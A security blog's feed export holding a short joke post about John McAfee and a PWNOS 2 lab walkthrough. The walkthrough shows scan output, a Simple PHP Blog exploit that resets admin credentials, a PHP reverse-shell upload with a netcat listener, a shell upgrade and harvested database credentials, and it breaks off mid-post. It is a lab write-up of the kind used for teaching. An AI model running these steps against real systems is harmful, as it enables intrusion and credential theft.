tag:blogger.com,1999:blog-45082179513309767032024-02-20T23:49:34.502-05:00Def Security JamCyber Security, Compliance, Security News, Vulnerabilities. Exploits, Tools & ExperiencesCourt Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.comBlogger15125tag:blogger.com,1999:blog-4508217951330976703.post-10500742394433422862015-07-24T11:13:00.000-04:002015-07-24T11:18:41.185-04:00John McAfee - How to Uninstall McAfee Antivirus<div dir="ltr" style="text-align: left;" trbidi="on">
This may be a bit dated but I find it totally hilarious and had to share it to those who haven't seen it as of yet. John definitely embodies the strategy of getting in the game and cashing out. I wonder what ever happened with that murder investigation. Watching this video makes it clear why Intel had no problems shedding the "McAfee" brand for "Intel Security" .... Anyway, enjoy!<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/bKgf5PaBzyg" width="560"></iframe><br />
<br />
Til next time,<br />
Court</div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-45427717579588120752015-07-11T19:45:00.003-04:002015-07-11T19:45:47.793-04:00PWNOS Version 2 Walkthrough<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<br /></div>
<div>
<br /></div>
<div>
Needing to keep the old knife sharp, i decided to try my luck at the <a href="http://www.pwnos.com/" target="_blank">PWNOS 2</a> vulnerable virtual machine. After setting up the VM in VirtualBox. I took the approach of configuring a NAT Network with the range of 10.10.10.0/24 which placed my machine on the same subnet as the static IP of 10.10.10.100 assigned to the image. </div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitz8VuSFitzYq648klZthFodJjhD6bRCuz9Ncc22-PYqxibKhWQ_mIWfSOv1Q32aE-tIcAROO8RXvta9BXQQF35iNK5l-Ip7mvhjRtbXCLkpFtScMXjZ9nA-wGD82Cs0Ziqp4bgWyb9VZQ/s1600/Screenshot+from+2015-07-05+11%253A23%253A42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitz8VuSFitzYq648klZthFodJjhD6bRCuz9Ncc22-PYqxibKhWQ_mIWfSOv1Q32aE-tIcAROO8RXvta9BXQQF35iNK5l-Ip7mvhjRtbXCLkpFtScMXjZ9nA-wGD82Cs0Ziqp4bgWyb9VZQ/s400/Screenshot+from+2015-07-05+11%253A23%253A42.png" width="400" /></a></div>
<div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">
root@kali:~# nmap 10.10.10.100<br /><br />Starting Nmap 6.47 (
http://nmap.org ) at 2015-07-04 22:44 EDT<br />Nmap scan report for
10.10.10.100<br />Host is up (0.00012s latency).<br />Not shown: 998
closed ports<br />PORT STATE SERVICE<br />22/tcp open
ssh<br />80/tcp open http<br />MAC Address:
08:00:27:6C:04:53 (Cadmus Computer Systems)<br /><br />Nmap done: 1 IP
address (1 host up) scanned in 0.30 seconds<br />root@kali:~# nmap
-A 10.10.10.100<br /><br />Starting Nmap 6.47 ( http://nmap.org ) at
2015-07-04 22:45 EDT<br />Nmap scan report for 10.10.10.100<br />Host
is up (0.00052s latency).<br />Not shown: 998 closed ports<br />PORT
STATE SERVICE VERSION<br />22/tcp open ssh
OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)<br />|
ssh-hostkey: <br />| 1024
85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)<br />|
2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)<br />|_
256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e
(ECDSA)<br />80/tcp open http Apache httpd 2.2.17
((Ubuntu))<br />|_http-methods: No Allow or Public header in OPTIONS
response (status code 200)<br />|_http-title: Welcome to this
Site!<br />MAC Address: 08:00:27:6C:04:53 (Cadmus Computer
Systems)<br />Device type: general purpose<br />Running: Linux
2.6.X<br />OS CPE: cpe:/o:linux:linux_kernel:2.6<br />OS details:
Linux 2.6.32 - 2.6.39<br />Network Distance: 1 hop<br />Service Info:
OS: Linux; CPE: cpe:/o:linux:linux_kernel<br /><br />TRACEROUTE<br />HOP
RTT ADDRESS<br />1 0.52 ms 10.10.10.100<br /><br />OS
and Service detection performed. Please report any incorrect
results at http://nmap.org/submit/ .<br />Nmap done: 1 IP address (1
host up) scanned in 9.34 seconds<br />root@kali:~#
<br />
</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
The default webpage on port 80 seemed to be an Intranet web site</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuICakx5Sg6zdXyySC6RFcXJQ7FCzMJA70M0vF3hFH3tN1xA7yAaJ-GzUcveESyGhBd8YbwXHZ5QuJ0X8k6etiO2wa3P5KP9Iiuh3-527_pGnSA_YKJHKBcPQxY3ImjstLt7_83gHzH_DM/s1600/Screenshot+from+2015-07-11+13%253A33%253A35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuICakx5Sg6zdXyySC6RFcXJQ7FCzMJA70M0vF3hFH3tN1xA7yAaJ-GzUcveESyGhBd8YbwXHZ5QuJ0X8k6etiO2wa3P5KP9Iiuh3-527_pGnSA_YKJHKBcPQxY3ImjstLt7_83gHzH_DM/s400/Screenshot+from+2015-07-11+13%253A33%253A35.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I decided to run my usual set of web server enumeration tools against the box.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">
root@kali:~# nikto -h http://10.10.10.100<br />- Nikto
v2.1.6<br />---------------------------------------------------------------------------<br />+
Target IP: 10.10.10.100<br />+
Target Hostname: 10.10.10.100<br />+ Target Port:
80<br />+ Start Time:
2015-07-04 22:47:08
(GMT-4)<br />---------------------------------------------------------------------------<br />+
Server: Apache/2.2.17 (Ubuntu)<br />+ Cookie PHPSESSID created
without the httponly flag<br />+ Retrieved x-powered-by header:
PHP/5.3.5-1ubuntu7<br />+ The anti-clickjacking X-Frame-Options
header is not present.<br />+ Uncommon header 'tcn' found, with
contents: list<br />+ Apache mod_negotiation is enabled with
MultiViews, which allows attackers to easily brute force file
names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The
following alternatives for 'index' were found: index.php<br />+
Apache/2.2.17 appears to be outdated (current is at least
Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also
current.<br />+ Web Server returns a valid response with junk HTTP
methods, this may cause false positives.<br />+ OSVDB-12184:
/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals
potentially sensitive information via certain HTTP requests that
contain specific QUERY strings.<br />+ OSVDB-12184:
/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals
potentially sensitive information via certain HTTP requests that
contain specific QUERY strings.<br />+ OSVDB-12184:
/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals
potentially sensitive information via certain HTTP requests that
contain specific QUERY strings.<br />+ OSVDB-12184:
/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals
potentially sensitive information via certain HTTP requests that
contain specific QUERY strings.<br />+ OSVDB-3268: /includes/:
Directory indexing found.<br />+ OSVDB-3092: /includes/: This might
be interesting...<br />+ OSVDB-3092: /info/: This might be
interesting...<br />+ OSVDB-3092: /login/: This might be
interesting...<br />+ OSVDB-3092: /register/: This might be
interesting...<br />+ OSVDB-3233: /info.php: PHP is installed, and a
test script which runs phpinfo() was found. This gives a lot of
system information.<br />+ OSVDB-3268: /icons/: Directory indexing
found.<br />+ Server leaks inodes via ETags, header found with file
/icons/README, inode: 1311031, size: 5108, mtime: Tue Aug 28
06:48:10 2007<br />+ OSVDB-3233: /icons/README: Apache default file
found.<br />+ OSVDB-5292:
/info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list
(http://ha.ckers.org/weird/rfi-locations.dat) or from
http://osvdb.org/<br />+ /login.php: Admin login page/section
found.<br />+ 7331 requests: 0 error(s) and 22 item(s) reported on
remote host<br />+ End Time:
2015-07-04 22:47:25 (GMT-4) (17
seconds)<br />---------------------------------------------------------------------------<br />+
1 host(s) tested<br />root@kali:~# <br /><br /><br />root@kali:~# dirb
http://10.10.10.100 /usr/share/wordlists/dirb/big.txt
<br /><br />-----------------<br />DIRB v2.21 <br />By The
Dark Raver<br />-----------------<br /><br />START_TIME: Sat Jul 4
22:48:59 2015<br />URL_BASE: http://10.10.10.100/<br />WORDLIST_FILES:
/usr/share/wordlists/dirb/big.txt<br /><br />-----------------<br /><br />GENERATED
WORDS: 20458
<br /><br />---- Scanning URL: http://10.10.10.100/ ----<br />+
http://10.10.10.100/activate (CODE:302|SIZE:0)
<br />==> DIRECTORY:
http://10.10.10.100/blog/
<br />+ http://10.10.10.100/cgi-bin/
(CODE:403|SIZE:288)
<br />==>
DIRECTORY: http://10.10.10.100/includes/
<br />+ http://10.10.10.100/index
(CODE:200|SIZE:854)
<br />+
http://10.10.10.100/info (CODE:200|SIZE:50171)
<br />+ http://10.10.10.100/login
(CODE:200|SIZE:1174)
<br />+
http://10.10.10.100/register (CODE:200|SIZE:1562)
<br />+ http://10.10.10.100/server-status
(CODE:403|SIZE:293)
<br />
<br />----
Entering directory: http://10.10.10.100/blog/ ----<br />+
http://10.10.10.100/blog/add (CODE:302|SIZE:0)
<br />+ http://10.10.10.100/blog/atom
(CODE:200|SIZE:1062)
<br />+
http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
<br />+ http://10.10.10.100/blog/colors (CODE:302|SIZE:0)
<br />+ http://10.10.10.100/blog/comments
(CODE:302|SIZE:0)
<br />==>
DIRECTORY: http://10.10.10.100/blog/config/
<br />+ http://10.10.10.100/blog/contact
(CODE:200|SIZE:5921)
<br />==> DIRECTORY:
http://10.10.10.100/blog/content/
<br />+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
<br />==> DIRECTORY:
http://10.10.10.100/blog/docs/
<br />==> DIRECTORY:
http://10.10.10.100/blog/flash/
<br />==> DIRECTORY:
http://10.10.10.100/blog/images/
<br />+ http://10.10.10.100/blog/index
(CODE:200|SIZE:8093)
<br />+
http://10.10.10.100/blog/info (CODE:302|SIZE:0)
<br />==> DIRECTORY:
http://10.10.10.100/blog/interface/
<br />==> DIRECTORY: http://10.10.10.100/blog/languages/
<br />+ http://10.10.10.100/blog/login
(CODE:200|SIZE:5670)
<br />+
http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
<br />+ http://10.10.10.100/blog/options
(CODE:302|SIZE:0)
<br />+
http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
<br />+ http://10.10.10.100/blog/rss
(CODE:200|SIZE:1237)
<br />==>
DIRECTORY: http://10.10.10.100/blog/scripts/
<br />+ http://10.10.10.100/blog/search
(CODE:200|SIZE:4954)
<br />+
http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
<br />+ http://10.10.10.100/blog/static
(CODE:302|SIZE:0)
<br />+
http://10.10.10.100/blog/stats (CODE:200|SIZE:5312)
<br />==> DIRECTORY:
http://10.10.10.100/blog/themes/
<br />+ http://10.10.10.100/blog/trackback
(CODE:302|SIZE:0)
<br />+
http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)
<br />+ http://10.10.10.100/blog/upload_img (CODE:302|SIZE:0)
<br />
<br />---- Entering directory:
http://10.10.10.100/includes/ ----<br />(!) WARNING: Directory IS
LISTABLE. No need to scan it.
<br /> (Use
mode '-w' if you want to scan it anyway)<br />
<br />---- Entering
directory: http://10.10.10.100/blog/config/ ----<br />(!) WARNING:
Directory IS LISTABLE. No need to scan it.
<br />
(Use mode '-w' if you want to scan it anyway)<br />
<br />----
Entering directory: http://10.10.10.100/blog/content/ ----<br />(!)
WARNING: Directory IS LISTABLE. No need to scan it.
<br />
(Use mode '-w' if you want to scan it anyway)<br />
<br />----
Entering directory: http://10.10.10.100/blog/docs/ ----<br />(!)
WARNING: Directory IS LISTABLE. No need to scan it.
<br />
(Use mode '-w' if you want to scan it anyway)<br />
<br />----
Entering directory: http://10.10.10.100/blog/flash/ ----<br />(!)
WARNING: Directory IS LISTABLE. No need to scan it.
<br />
(Use mode '-w' if you want to scan it anyway)<br />
<br />----
Entering directory: http://10.10.10.100/blog/images/ ----<br />(!)
WARNING: Directory IS LISTABLE. No need to scan it.
<br />
(Use mode '-w' if you want to scan it anyway)<br />
<br />----
Entering directory: http://10.10.10.100/blog/interface/ ----<br />(!)
WARNING: Directory IS LISTABLE. No need to scan it.
<br />
(Use mode '-w' if you want to scan it anyway)<br />
<br />----
Entering directory: http://10.10.10.100/blog/languages/ ----<br />(!)
WARNING: Directory IS LISTABLE. No need to scan it.
<br />
(Use mode '-w' if you want to scan it anyway)<br />
<br />----
Entering directory: http://10.10.10.100/blog/scripts/ ----<br />(!)
WARNING: Directory IS LISTABLE. No need to scan it.
<br />
(Use mode '-w' if you want to scan it anyway)<br />
<br />----
Entering directory: http://10.10.10.100/blog/themes/ ----<br />(!)
WARNING: Directory IS LISTABLE. No need to scan it.
<br />
(Use mode '-w' if you want to scan it anyway)<br />
<br />-----------------<br />DOWNLOADED: 40916 - FOUND:
28<br />root@kali:~#
<br />
</td>
</tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both;">
The DirBuster scan also revealed a login.php site which seemed to be prone to SQL Injection but was definitely filtering some of the more basic exploits. </div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUbfEDIMpWPn760HH0rFlIs6bPSRE1xpJUMayeY7cghIL1xeZ3XiAQXGtl1Li96dNbqpWMKOpQRRHKFDBbOFTeRa7mK7zsPprf23Hc5n8H1D9UPCyIWzFo-iKSxK6Mtx2h8r1CuctUhQQ8/s1600/Screenshot+from+2015-07-04+23%253A40%253A08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUbfEDIMpWPn760HH0rFlIs6bPSRE1xpJUMayeY7cghIL1xeZ3XiAQXGtl1Li96dNbqpWMKOpQRRHKFDBbOFTeRa7mK7zsPprf23Hc5n8H1D9UPCyIWzFo-iKSxK6Mtx2h8r1CuctUhQQ8/s400/Screenshot+from+2015-07-04+23%253A40%253A08.png" width="400" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
I decided to take a closer look at the source of the /blog page. I found that the underlying app was Simple PHP Blog 0.4.0.</div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYs4N6JoKzRi6oK0Q0ZjB-BC9rDHH3DS8u6lhPQSFe_vhpTfOs-IxaOLYTvpKi0axHbZ4zr_Lu-lbiTGeDX1YqdSu3m34rJwNR2rITHsUl59lQAcbZFOHTHJ3721yNrdNBbg45rFR-gGrr/s1600/Screenshot+from+2015-07-05+00%253A13%253A29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYs4N6JoKzRi6oK0Q0ZjB-BC9rDHH3DS8u6lhPQSFe_vhpTfOs-IxaOLYTvpKi0axHbZ4zr_Lu-lbiTGeDX1YqdSu3m34rJwNR2rITHsUl59lQAcbZFOHTHJ3721yNrdNBbg45rFR-gGrr/s400/Screenshot+from+2015-07-05+00%253A13%253A29.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Lets see if we can find any vulnerabilities or exploits associated with Simple PHP Blog 0.4.0</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiISJ8a4sj4Ncuo7rzAnFzEUirz09zT2Luggsz3cRzLh5_A8gjutuBTfOfBL78TywE0fCArScSb-euCxH_ZW2UzqUtDoeRmoNrjnkHdwyDwRy3K8MoxjIg0DnV59EuSB0WO1Vnqp65d-3VU/s1600/Screenshot+from+2015-07-05+00%253A08%253A30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiISJ8a4sj4Ncuo7rzAnFzEUirz09zT2Luggsz3cRzLh5_A8gjutuBTfOfBL78TywE0fCArScSb-euCxH_ZW2UzqUtDoeRmoNrjnkHdwyDwRy3K8MoxjIg0DnV59EuSB0WO1Vnqp65d-3VU/s400/Screenshot+from+2015-07-05+00%253A08%253A30.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
The exploitdb had a couple exploits that fit the bill, one Metasploit module as well as the perl based exploit that I decided to go with
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGb7ppuk3zin5S3YAjsiIoIHNymBE5d_DRroDtDAKn4HutC_T9q8w5MKdNgHBDH_DOAvyiVa-KxUanyecrefsWIe13k3HnsnGisakYnbCIf6Z4O1xiQ2k3BLNfBQ5XcQvo8-i86Jejdtqn/s1600/Screenshot+from+2015-07-11+19%253A21%253A22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGb7ppuk3zin5S3YAjsiIoIHNymBE5d_DRroDtDAKn4HutC_T9q8w5MKdNgHBDH_DOAvyiVa-KxUanyecrefsWIe13k3HnsnGisakYnbCIf6Z4O1xiQ2k3BLNfBQ5XcQvo8-i86Jejdtqn/s400/Screenshot+from+2015-07-11+19%253A21%253A22.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e
2<br /><br /><br /><br />________________________________________________________________________________<br />
SimplePHPBlog v0.4.0 Exploits<br /> by<br />
Kenneth F. Belva, CISSP<br />
http://www.ftusecurity.com<br />________________________________________________________________________________<br />Running
Username and Password Hash Retrieval Exploit....<br /><br /><br />Retrieved
Username and Password Hash:
$1$zsdi5o/7$kJuEkwpL6uEqhrXFDn98y/<br /><br /><br />*** Exploit
Completed....<br />Have a nice day! :)<br />root@kali:~/pwnos2# perl
1191.pl -h http://10.10.10.100/blog -e
3<br /><br /><br /><br /><br /><br />________________________________________________________________________________<br />
SimplePHPBlog v0.4.0 Exploits<br /> by<br />
Kenneth F. Belva, CISSP<br />
http://www.ftusecurity.com<br />________________________________________________________________________________<br />Running
Set New Username and Password Exploit....<br /><br /><br />Deleted File:
./config/password.txt<br />Use of uninitialized value $user in
concatenation (.) or string at 1191.pl line
341.<br />./config/password.txt created!<br />Use of uninitialized
value $pass in concatenation (.) or string at 1191.pl line
342.<br />Username is set to: <br />Password is set to: <br /><br /><br />***
Exploit Completed....<br />Have a nice day! :)<br />root@kali:~/pwnos2#
perl 1191.pl -h http://10.10.10.100/blog -e 3 -U court -P
password<br /><br /><br /><br /><br />________________________________________________________________________________<br />
SimplePHPBlog v0.4.0 Exploits<br /> by<br />
Kenneth F. Belva, CISSP<br />
http://www.ftusecurity.com<br />________________________________________________________________________________<br />Running
Set New Username and Password Exploit....<br /><br /><br />Deleted File:
./config/password.txt<br />./config/password.txt created!<br />Username
is set to: court<br />Password is set to: password<br /><br /><br />***
Exploit Completed....<br />Have a nice day! :)<br />root@kali:~/pwnos2#
ls<br />1191.pl exploit2.php exploit.php<br />root@kali:~/pwnos2#
cp /var/www/php-reverse-shell.php .<br />root@kali:~/pwnos2# nano
php-reverse-shell.php <br />root@kali:~/pwnos2# <br /><br />
<br />
</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
Awesome, the exploit allow me to create on the blog application, hopefully I can now upload a web or reverse shell to the system.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWUj50-5rGenBH3bVi4QwObmjq-yoEAHiJB_6Uw1wdWAlNOalFGbl04iI1C7YNPgVE6RU_8drtW5K5uKttkEFnXiIO0ULcLoS1qcY_TyxxgwH7uWBqClynXf0rklzN8fEUJQoxmIXwLH7p/s1600/Screenshot+from+2015-07-05+00%253A11%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWUj50-5rGenBH3bVi4QwObmjq-yoEAHiJB_6Uw1wdWAlNOalFGbl04iI1C7YNPgVE6RU_8drtW5K5uKttkEFnXiIO0ULcLoS1qcY_TyxxgwH7uWBqClynXf0rklzN8fEUJQoxmIXwLH7p/s400/Screenshot+from+2015-07-05+00%253A11%253A40.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The first place I always check in on the Kali Linux disto under /usr/share/webshells/php. I used the old reliable php_reverse_shell.php. After modifying the code to match my IP address, I successfully uploaded the code to the blog site. I was afraid that it I'd run into filtering which would restrict the file type, but was lucky this time.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbX9VxOhlbYIY0VwKERTusg3XXzSKlqlTRItzfXD4EYkMirLyKUY1G6WPIZUsAx2RkD1dflwaNFxUGUvq8H1szbtrEpc3x5txh42QiGfx1GW-3T9QCAAx6bytmpYcofNTAAn15dpJoy0B1/s1600/Screenshot+from+2015-07-05+10%253A43%253A06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbX9VxOhlbYIY0VwKERTusg3XXzSKlqlTRItzfXD4EYkMirLyKUY1G6WPIZUsAx2RkD1dflwaNFxUGUvq8H1szbtrEpc3x5txh42QiGfx1GW-3T9QCAAx6bytmpYcofNTAAn15dpJoy0B1/s400/Screenshot+from+2015-07-05+10%253A43%253A06.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I uploaded the shell, started a netcat listener on my system for port 1234, as set within my php_reverse_shell.php file, browsed to the malicious page (10.10.10.100/blog/images/php_reverse_shell.php) and boom! I'm in</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnT88ujj_-Vwn9fUlUXOySB7I2TJrDo_EXUVLL6GRU5EFOq_l2tcfsDVikcmUCYUx_1jLVA615zGr2dssIHadFC1wXg6nexYf_wr1aI4KfWpJybzB_NBqCLTEJvFsnlqknXnwP6gR1lKYM/s1600/Screenshot+from+2015-07-05+10%253A42%253A18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnT88ujj_-Vwn9fUlUXOySB7I2TJrDo_EXUVLL6GRU5EFOq_l2tcfsDVikcmUCYUx_1jLVA615zGr2dssIHadFC1wXg6nexYf_wr1aI4KfWpJybzB_NBqCLTEJvFsnlqknXnwP6gR1lKYM/s400/Screenshot+from+2015-07-05+10%253A42%253A18.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Having no job control in this shell I used the installed instance of python to get an improved shell. I looked around a bit in the /var/www directory for interesting give-aways in files.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">
root@kali:~/pwnos2# nc -lvp 1234<br />listening on [any] 1234
...<br />10.10.10.100: inverse host lookup failed: Unknown server
error : Connection timed out<br />connect to [10.10.10.5] from
(UNKNOWN) [10.10.10.100] 36792<br />Linux web 2.6.38-8-server
#42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64
GNU/Linux<br /> 01:57:41 up 3:34, 0 users, load
average: 0.00, 0.01, 0.05<br />USER TTY
FROM LOGIN@
IDLE JCPU PCPU WHAT<br />uid=33(www-data)
gid=33(www-data) groups=33(www-data)<br />/bin/sh: can't access tty;
job control turned off<br /><br />$
/bin/bash -i<br />bash: no job control in this
shell<br />www-data@web:/var/www$ python -c 'import pty;
pty.spawn("/bin/bash")'<br />python -c 'import pty;
pty.spawn("/bin/bash")'<br />www-data@web:/var/www$
ls<br />ls<br />activate.php includes info.php
mysqli_connect.php<br />blog index.php
login.php register.php<br />www-data@web:/var/www$ more
<br /><br /><br />
<br />
</td>
</tr>
</tbody></table>
<br />The file named mysqli_connect.php had some mysql db credentials in it.<br /><br /><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVjdYrdEBebw5QtltMX8b4bUvjp6yffTxyKpO_sTMaAOQU4hbJuebbwz5Ni7WM_yLkQpnIeBH-VAwlPKtnCS23QQ0aS96DNIkJdFifAFGx77Yl16hRPDtn-bPeonV8FNiT8eHPdRgjJjri/s1600/Screenshot+from+2015-07-05+11%253A23%253A42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVjdYrdEBebw5QtltMX8b4bUvjp6yffTxyKpO_sTMaAOQU4hbJuebbwz5Ni7WM_yLkQpnIeBH-VAwlPKtnCS23QQ0aS96DNIkJdFifAFGx77Yl16hRPDtn-bPeonV8FNiT8eHPdRgjJjri/s400/Screenshot+from+2015-07-05+11%253A23%253A42.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
DEFINE ('DB_USER', 'root');<br />
DEFINE ('DB_PASSWORD', 'goodday');<br />
DEFINE ('DB_HOST', 'localhost');<br />
DEFINE ('DB_NAME', 'ch16');</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We all know about the likelihood of password reuse, so I attempted to try what I found both inside and outside the database. Unfortunately it didn't workout for me. I spent several hours running local privilege escalation exploits, Linux privilege vulnerability scripts, etc, until I stumbled across a separate file also named mysqli_connect.php located at in the /var directory. This file had separate credentials which worked for the mysql instance. I decided to pillage the db a bit.</div>
<div class="separator" style="clear: both; text-align: left;">
